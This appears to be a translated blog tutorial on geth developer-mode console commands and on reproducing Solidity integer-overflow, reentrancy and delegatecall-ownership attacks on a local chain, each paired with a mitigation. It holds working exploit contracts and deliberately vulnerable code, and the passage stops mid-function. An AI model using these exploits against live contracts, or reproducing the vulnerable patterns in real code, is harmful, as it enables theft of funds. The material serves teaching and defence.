
Commonly used web3 console commands

Create a new account

personal.newAccount()

Query an account balance

(displayed in ether; works for contract accounts as well):
web3.fromWei(eth.getBalance("0xfe44108f962ae9afa23699b5b7f1fa817e5b5012"), "ether")

Define a variable

var acc0 = eth.accounts[0]

Unlock an account

(in dev mode every account other than the developer account accounts[0] has to be unlocked before it can sign a transaction; geth prompts for the passphrase, and the unlock expires after 300 seconds unless a longer duration in seconds is passed as the third argument):
personal.unlockAccount(eth.accounts[1])

Transfer ether

(acc0 and acc1 are variables defined beforehand as above; a quoted address literal works just as well):
eth.sendTransaction({from: acc0, to: acc1, value: web3.toWei('100', 'ether')})

Set the account used for subsequent calls

web3.eth.defaultAccount = web3.eth.accounts[0]

Calling contract functions

Calling a function as a transaction (sendTransaction)

(if the function does not need msg.value, simply drop the value option):

contractName.functionName.sendTransaction(args, {from: "0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb", value: web3.toWei('10', 'ether')})

(this costs gas, paid by the from: account; the console returns the transaction hash, not the function's return value, and state changes only take effect once the transaction is mined)

Calling a function read-only (call)

contractName.functionName.call(args)

(executed locally against the current state, costs no gas and returns the function's return value, but any state changes it makes are discarded)

Accounts persist across restarts in the keystore directory under the datadir; accounts[0] is the developer account, pre-funded with an effectively unlimited ether balance.

Account addresses

// the following are my own account data directories, listed here for easy copy-pasting

attack1 datadir:

eth.accounts
["0x2378f0b099a2c18ff2157aa9f96c5617b0241168",
 "0x910d3a7564d50311e4cdbd11bc8d9068aa9ec2f9",
 "0x5f3d8493dfce07d413bf56e3fb295116ac24cb88",
 "0x044a672165513e4a19b781acb95563d8377e7206"]

attack2 datadir:

eth.accounts
["0xfe44108f962ae9afa23699b5b7f1fa817e5b5012",
 "0xf1837bfdfcc5be3a63e5b899cd54b69950009b07"]

attack3 datadir:

eth.accounts
["0xb14c4c98d7adf099f940fea652955c3c9d3de021",
 "0xde04aeaf51781f55353ccf6511c3c82ec43bd2bb"]

Starting geth

Add the go-ethereum build directory to PATH at the end of /etc/profile (the path is <your go-ethereum checkout>/build/bin; mine lives under /home):

export PATH=$PATH:/home/go-ethereum/build/bin

Start geth in developer mode (--dev: no genesis.json needed, a single command, and a block is mined instantly whenever a transaction is pending, which is very convenient for experiments; --datadir is where the chain data is stored, best to create a fresh directory for it; 2> redirects the log to a file):

geth --datadir ./crosschain_datadir --dev console 2>output.log

Open a second terminal and run tail -f output.log to follow the log without disturbing the console.

Reproducing several attacks

Integer overflow

uint256 arithmetic in Solidity 0.4.x wraps silently modulo 2**256: 2**256-1 + 1 is 0, 0 - 1 is 2**256-1 and 2**255 * 2 is 0. Each function below returns the wrapped value; after deploying, read them with poc.add_overflow.call() and so on.

pragma solidity ^0.4.22;
contract POC{
    // no overflow checks in this compiler version: every result wraps modulo 2**256
    function add_overflow() public returns (uint256 _overflow){
        uint256 max = 2**256-1;
        return max+1;      // wraps to 0
    }
    function sub_underflow() public returns (uint256 _underflow){
        uint256 min=0;
        return min-1;      // wraps to 2**256-1
    }
    function mul_overflow() public returns (uint256 _overflow){
        uint256 mul= 2**255;
        return mul*2;      // wraps to 0
    }
}

Contract deployment

Deployment method 1

(method 1 is recommended; method 2 is more cumbersome and has a few problems):

Paste the WEB3DEPLOY snippet from Remix into the geth console and press Enter.

Points to watch:
[screenshot of the Remix WEB3DEPLOY snippet with the four spots to edit marked in red]

Delete `new`, lowercase the C in `Contract`, change `deploy` to `new`, and delete the contents of the fourth red box. The reason is that the geth console embeds web3.js 0.20, whose contract API is web3.eth.contract(abi).new(...), whereas Remix generates the web3 1.x form new web3.eth.Contract(abi).deploy(...).

After editing, the snippet looks like this:

var pocContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"_underflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '0x608060405234801561001057600080fd5b5061017a806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063656781711461005c578063df541bdb14610087578063eb67eaa7146100b2575b600080fd5b34801561006857600080fd5b506100716100dd565b6040518082815260200191505060405180910390f35b34801561009357600080fd5b5061009c6100ee565b6040518082815260200191505060405180910390f35b3480156100be57600080fd5b506100c761011e565b6040518082815260200191505060405180910390f35b600080600090506001810391505090565b6000807fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff90506001810191505090565b6000807f8000000000000000000000000000000000000000000000000000000000000000905060028102915050905600a165627a7a723058200122e17839720f0ff44791ef902738f9cfb738a12e01cfe7c41ee0591c2fa9db0029', 
     
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

poc is the contract instance; its public functions can be invoked directly as poc.function.call() and poc.function.sendTransaction().

Deployment method 2

Take the ABI and bytecode from Remix. The ABI as copied first has to be turned into a JSON string, for example with http://www.bejson.com/jsonviewernew/ (the console also accepts the ABI array pasted directly as a JavaScript literal, which is what the line below does).

abi=[{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"_overflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"_underflow","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]

For the bytecode take only the object field, prefix it with 0x and wrap it in double quotes:

e.g. bytecode="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"

contract = eth.contract(abi);
eth.estimateGas({data: bytecode})   // estimate the deployment gas
initializer = {from: web3.eth.accounts[0], data: bytecode, gas: 140000};   // use somewhat more than the estimate
token = contract.new(initializer)   // token is the contract instance; its functions can be called on it directly
web3.eth.defaultAccount = web3.eth.accounts[0]   // initial setup; not needed in dev mode

mycontract = contract.at(token.address)   // once mined, token can be used directly; after restarting geth, re-instantiate with this line (token.address is only filled in once the creation transaction is mined, so check it is defined first)

mycontract.function()   // call

Mitigation (SafeMath-style checked arithmetic; each of the three calls now reverts on the failed require instead of returning a wrapped value):

pragma solidity ^0.4.22;
contract POC{

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
        if (a == 0) {
            return 0;
        }
 
        uint256 c = a * b;
        require(c / a == b);
 
        return c;
    }
 
    /**
     * @dev Integer division of two unsigned integers truncating the quotient, reverts on division by zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
        return c;
    }
 
    /**
     * @dev Subtracts two unsigned integers, reverts on overflow (i.e. if subtrahend is greater than minuend).
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a);
        uint256 c = a - b;
 
        return c;
    }
 
    /**
     * @dev Adds two unsigned integers, reverts on overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a);
 
        return c;
    }
 
    /**
     * @dev Divides two unsigned integers and returns the remainder (unsigned integer modulo),
     * reverts when dividing by zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0);
        return a % b;
    }
    function add_overflow() public returns (uint256 a){
        uint256 max = 2**256-1;
        return add(max,1);        // require(c >= a) fails -> revert
    }
    function sub_underflow() public returns (uint256 b){
        uint256 min=0;
        return sub(min,1);        // require(b <= a) fails -> revert
    }
    function mul_overflow() public returns (uint256 c){
        uint256 mulamount= 2**255;
        return mul(mulamount,2);  // require(c / a == b) fails -> revert
    }
}
var pocContract =web3.eth.contract([{"constant":false,"inputs":[],"name":"sub_underflow","outputs":[{"name":"b","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"add_overflow","outputs":[{"name":"a","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"mul_overflow","outputs":[{"name":"c","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var poc = pocContract.new({
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
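The POC above overflows constants it computes itself. The following is an added example, not code from the original post, that shows the same wraparound where it actually costs money: a batchTransfer() modelled on the BeautyChain (BEC) bug, where cnt * _value overflows to 0, the balance check passes, and every receiver is credited 2**255 tokens. The hardened form routes each step through SafeMath so the same call reverts before any state changes. The contract names and token amounts are assumptions for illustration.

```solidity
pragma solidity ^0.4.24;

// Added example (not from the original post). Call
// batchTransfer([addr1, addr2], 2**255) on each contract: VulnerableToken
// mints 2**255 tokens to both receivers, FixedToken reverts in mul().
library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "mul overflow");
        return c;
    }
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "add overflow");
        return c;
    }
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "sub underflow");
        return a - b;
    }
}

contract VulnerableToken {
    mapping(address => uint256) public balanceOf;

    constructor() public { balanceOf[msg.sender] = 1000; }   // assumed initial supply

    // Vulnerable: with cnt = 2 and _value = 2**255 the product wraps to 0, so the
    // balance check passes, 0 is debited, and each receiver is credited 2**255.
    function batchTransfer(address[] _receivers, uint256 _value) public returns (bool) {
        uint256 cnt = _receivers.length;
        uint256 amount = cnt * _value;            // unchecked multiply
        require(cnt > 0 && cnt <= 20);
        require(_value > 0 && balanceOf[msg.sender] >= amount);
        balanceOf[msg.sender] -= amount;          // subtracts 0
        for (uint256 i = 0; i < cnt; i++) {
            balanceOf[_receivers[i]] += _value;   // credits 2**255 each
        }
        return true;
    }
}

contract FixedToken {
    using SafeMath for uint256;
    mapping(address => uint256) public balanceOf;

    constructor() public { balanceOf[msg.sender] = 1000; }   // assumed initial supply

    // Hardened: every arithmetic step is checked, so 2 * 2**255 reverts in mul()
    // before the balance check is even reached.
    function batchTransfer(address[] _receivers, uint256 _value) public returns (bool) {
        uint256 cnt = _receivers.length;
        uint256 amount = cnt.mul(_value);
        require(cnt > 0 && cnt <= 20);
        require(_value > 0 && balanceOf[msg.sender] >= amount);
        balanceOf[msg.sender] = balanceOf[msg.sender].sub(amount);
        for (uint256 i = 0; i < cnt; i++) {
            balanceOf[_receivers[i]] = balanceOf[_receivers[i]].add(_value);
        }
        return true;
    }
}
```

From the geth console, pass _value as the decimal string of 2**255 (57896044618658097711785492504343953926634992332820282019728792003956564819968) so web3 0.20 does not lose precision, then read balanceOf() of one of the receivers on each contract.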

Reentrancy attack

Victim.withDraw() sends the ether with call.value(), which forwards all remaining gas, before it zeroes userBalannce[msg.sender]. When msg.sender is the Attacker contract, its fallback calls withDraw() again while the first invocation is still suspended, and the balance check passes again. Sequence from the console: deploy Victim with some ether, deploy Attacker with 10 ether, attacker.sendMoney(victim.address, {from: eth.accounts[0]}) to register a 1 ether balance, then attacker.reentry(victim.address, {from: eth.accounts[0]}); attacker.test() counts the re-entries, and victim.showAccount() / attacker.showAccount() show where the ether ended up.

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    // Vulnerable: the external call happens BEFORE the balance is zeroed, so the
    // recipient's fallback can call withDraw() again and be paid again.
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            msg.sender.call.value(amount)();   // forwards all remaining gas
            userBalannce[msg.sender] = 0;
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;   // counts how many times the fallback was entered
    function Attacker() payable{}
    // Runs while Victim.withDraw() is still mid-execution and calls straight back in;
    // the recursion only stops when the Victim can no longer pay or gas runs out.
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){   // deposit 1 ether so userBalannce[this] > 0
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){     // kick off the attack
        Victim(addr).withDraw();
    }
}

Deploying account

This is the account given at from: web3.eth.accounts[0]; any account other than accounts[0] has to be unlocked once before deploying.

var victimContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 

Contract mined! address: 0x58c4688b17b24831103a25344f01812f62e711bd transactionHash: 0x5ee74325304fc8c7688a8504ba774524d382bbbec15033a3677332b0cd0e0701

The second contract, Attacker:

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:10000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xc852dadfa72c66c479d3b45672bb7cd50bbad658 transactionHash: 0xb348fd2e63bebfac65e7494cda20ebaf28fe4dc445898694dd7b3e187251a1f0

Mitigation (checks-effects-interactions: zero the balance before the external call, so a re-entrant withDraw() finds userBalannce[msg.sender] == 0 and pays nothing; the Attacker is unchanged and now gets back only its own 1 ether):

pragma solidity ^0.4.19;
 
contract Victim {
    mapping(address => uint) public userBalannce;
    uint public amount = 0;
    function Victim() payable{}
    // Fixed ordering: effect (zero the balance) before interaction (external call)
    function withDraw(){
        uint amount = userBalannce[msg.sender];
        if(amount > 0){
            userBalannce[msg.sender] = 0;
            msg.sender.call.value(amount)();
        }
    }
    function() payable{}
    function receiveEther() payable{
        if(msg.value > 0){
            userBalannce[msg.sender] += msg.value;
        }
    }
     function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
}
 
contract Attacker{
    uint public amount = 0;
    uint public test = 0;
    function Attacker() payable{}
    function() payable{
        test++;
        Victim(msg.sender).withDraw();
    }
    function showAccount() public returns (uint){
        amount = this.balance;
        return this.balance;
    }
    function sendMoney(address addr){
        Victim(addr).receiveEther.value(1 ether)();
    }
    function reentry(address addr){
        Victim(addr).withDraw();
    }
}

var victimContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"withDraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"receiveEther","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"userBalannce","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var victim = victimContract.new({
     data: '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', 
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:25000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xafe0d2de59b350c1ae67b3238f9697c6be32275e transactionHash: 0x3fa4e24bfc1510ae78d029ebf628524ceb313688c9262bb7c69b69480001e367

var attackerContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"sendMoney","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"addr","type":"address"}],"name":"reentry","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"showAccount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"test","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var attacker = attackerContract.new({
     data: '0x60606040526000805560006001556103578061001c6000396000f30060606040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063338ccd78146100f85780633c04ec3314610131578063a657bbcc1461016a578063aa8c217c14610193578063f8a8fd6d146101bc575b6001600081548092919060010191905055503373ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156100e257600080fd5b6102c65a03f115156100f357600080fd5b505050005b341561010357600080fd5b61012f600480803573ffffffffffffffffffffffffffffffffffffffff169060200190919050506101e5565b005b341561013c57600080fd5b610168600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610268565b005b341561017557600080fd5b61017d6102e2565b6040518082815260200191505060405180910390f35b341561019e57600080fd5b6101a661031f565b6040518082815260200191505060405180910390f35b34156101c757600080fd5b6101cf610325565b6040518082815260200191505060405180910390f35b8073ffffffffffffffffffffffffffffffffffffffff1663a3912ec8670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b151561025057600080fd5b6125ee5a03f1151561026157600080fd5b5050505050565b8073ffffffffffffffffffffffffffffffffffffffff16630fdb1c106040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15156102cb57600080fd5b6102c65a03f115156102dc57600080fd5b50505050565b60003073ffffffffffffffffffffffffffffffffffffffff16316000819055503073ffffffffffffffffffffffffffffffffffffffff1631905090565b60005481565b600154815600a165627a7a723058209b92242a801d86ca4f2593daa27cbe5c9245f95aa5ec9edb34ebc96460ddca600029', 
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
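Reordering the two lines is the minimal fix. The block below is an added example, not code from the original post: a bounded attacker that can be pointed at either of two vaults so the outcomes can be compared from the console. LeakyVault repeats the post's bug (interaction before effect); GuardedVault applies checks-effects-interactions and adds a reentrancy mutex so a later edit that reorders the lines again is still safe. All contract names and amounts are assumptions for illustration.

```solidity
pragma solidity ^0.4.24;

// Added example (not from the original post). Expected outcome after
// attack() with the vault holding at least 5 ether from other depositors:
//   LeakyVault:   attempts == 5, succeeded == 5, attacker paid 6 ether for 1
//   GuardedVault: attempts == 1, succeeded == 0, attacker paid exactly 1 ether
contract VaultBase {
    mapping(address => uint256) public balances;

    function deposit() public payable {
        require(msg.value > 0, "empty deposit");
        balances[msg.sender] += msg.value;
    }

    function withdraw() public;

    function vaultBalance() public view returns (uint256) {
        return address(this).balance;
    }
}

contract LeakyVault is VaultBase {
    // Pays first and zeroes the balance afterwards: the fallback of msg.sender
    // runs in between and can call withdraw() again at the full balance.
    function withdraw() public {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        require(msg.sender.call.value(amount)(), "send failed");
        balances[msg.sender] = 0;
    }
}

contract GuardedVault is VaultBase {
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    // Effect before interaction, and the mutex rejects any nested call.
    function withdraw() public nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;
        require(msg.sender.call.value(amount)(), "send failed");
    }
}

// Deposits 1 ether, withdraws it, and re-enters from the fallback at most
// MAX_DEPTH times, counting attempts and how many the vault actually paid.
contract ProbingAttacker {
    uint256 public constant MAX_DEPTH = 5;
    uint256 public attempts;    // nested withdraw() calls issued
    uint256 public succeeded;   // nested calls that were paid out
    uint256 private depth;
    address public owner;
    VaultBase public target;

    constructor(address _target) public payable {
        owner = msg.sender;
        target = VaultBase(_target);
    }

    function attack() public {
        require(msg.sender == owner, "owner only");
        require(address(this).balance >= 1 ether, "fund the attacker first");
        depth = 0;
        target.deposit.value(1 ether)();
        target.withdraw();
    }

    function () public payable {
        if (depth >= MAX_DEPTH) {
            return;                 // bound the recursion against LeakyVault
        }
        depth++;
        attempts++;
        // Low-level call: a revert from the mutex must not bubble up and undo
        // the legitimate outer withdrawal.
        if (address(target).call(abi.encodeWithSignature("withdraw()"))) {
            succeeded++;
        }
    }

    function collect() public {
        require(msg.sender == owner, "owner only");
        owner.transfer(address(this).balance);
    }
}
```

Deploy ProbingAttacker with value: web3.toWei('1', 'ether') and the vault address as constructor argument, fund the vault from another account with deposit(), then send attack() with an explicit gas limit (e.g. gas: 1000000) so the nested calls are not cut short, and read attempts(), succeeded() and vaultBalance() afterwards.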

delegatecall vulnerability

Delegation's fallback runs Delegate.setOwner() via delegatecall, i.e. with Delegation's own storage and with the original msg.sender preserved. setOwner() writes storage slot 0, which in Delegation holds owner, so any transaction that lands in the fallback, for example one with empty data such as eth.sendTransaction({from: eth.accounts[1], to: delegation.address, gas: 100000}), makes the sender Delegation's owner; delegation.owner() confirms it afterwards.

pragma solidity ^0.4.10;
contract Delegate {
    address public owner;                          // slot 0 of Delegate's layout
    function Delegate(address _owner) {
        owner = _owner;
    }
    function setOwner() {                          // writes slot 0 of whichever storage it runs in
        owner = msg.sender;
    }
}
contract Delegation {
    address public owner;                          // slot 0: the slot setOwner() will overwrite
    Delegate delegate;
    function Delegation(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }
    // Any call matching no function (including a plain transaction with empty data)
    // lands here and executes Delegate.setOwner() in Delegation's storage context,
    // so the caller becomes Delegation's owner.
    function () {
        if (delegate.delegatecall(bytes4(keccak256("setOwner()")))) {
            this;
        }
    }
}

The first contract, Delegate:

Passing constructor arguments at deployment

Define the arguments as variables in the first lines of the WEB3DEPLOY snippet, then put the variable list between the ( and { of contract.new( (third line below), comma-separated and with a trailing comma after the last one; address-typed variables must be written as quoted strings.

var _owner = "0x2378f0b099a2c18ff2157aa9f96c5617b0241168" ;
var delegateContract = web3.eth.contract([{"constant":false,"inputs":[],"name":"setOwner","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_owner","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegate = delegateContract.new(_owner,
{
     data: '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', 
          
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8 transactionHash: 0x65bb9d9488fde84f6ae526a926af64dcaf6e055f591d1dc092abfe69e701a336

The second contract, Delegation (the first snippet below comes from an earlier build whose ABI still carries an explicit attack() function; the second snippet matches the fallback-based source above and was deployed in a separate session, hence the different Delegate address):

var _delegateAddress = "0x289c5b897c0b30f4962d3e39c1b8ef62dfd7b4f8" ;
var delegationContract = web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"attack","outputs":[],"payable":false,"type":"function","stateMutability":"nonpayable"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new( _delegateAddress,
{
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
 
 var _delegateAddress = "0x06e1b0366ea9d22731d03e2dfffbdbcfca2796d6" ;   // the address must be quoted, as noted above
var delegationContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_delegateAddress","type":"address"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var delegation = delegationContract.new(
_delegateAddress,{
     data: '0x6060604052341561000c57fe5b60405160208061029d833981016040528080519060200190919050505b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033600060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b505b6101e0806100bd6000396000f3006060604052361561003f576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680638da5cb5b1461013c575b341561004757fe5b61013a5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1660405180807f7365744f776e6572282900000000000000000000000000000000000000000000815250600a01905060405180910390207c010000000000000000000000000000000000000000000000000000000090046000604051602001526040518163ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018090506020604051808303818660325a03f4151561012b57fe5b50505060405180519050505b5b565b005b341561014457fe5b61014c61018e565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b600060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16815600a165627a7a72305820d6b31560aaabb2281f6c60ab7aad2f19587c00e7225ec7cb71be82da7f6b96b70029', 

     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xd1115e35e29b3c14e2a4091aa16026eeb19995ca transactionHash: 0xd12bccb652b818fcd3b68e34c3b7aa20a3a321be5aa16d9ebde0bb6f3d1123ea
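The block below is an added example, not code from the original post: the same Delegate/Delegation pair with the fallback closed off. SafeDelegation keeps delegatecall for the one routine it actually wants (a hypothetical ping()), forwards only selectors on an explicit allow-list, and keeps owner in slot 0 so the storage-layout hazard is visible in the source. The names and the ping() routine are assumptions for illustration.

```solidity
pragma solidity ^0.4.24;

// Added example (not from the original post). Against the post's Delegation an
// empty-data transaction is enough to take ownership; against SafeDelegation
// the same transaction reverts with "no selector", and a transaction carrying
// the setOwner() selector reverts with "selector not allowed".
contract Delegate {
    address public owner;                     // slot 0 of the Delegate layout

    constructor(address _owner) public { owner = _owner; }

    function setOwner() public { owner = msg.sender; }

    function ping() public pure returns (uint256) { return 42; }   // harmless routine we do want
}

contract SafeDelegation {
    address public owner;                     // slot 0: exactly what setOwner() would overwrite
    Delegate public delegate;

    constructor(address _delegateAddress) public {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    // Explicit allow-list of selectors that may be forwarded; setOwner() is not on it.
    function allowed(bytes4 selector) internal pure returns (bool) {
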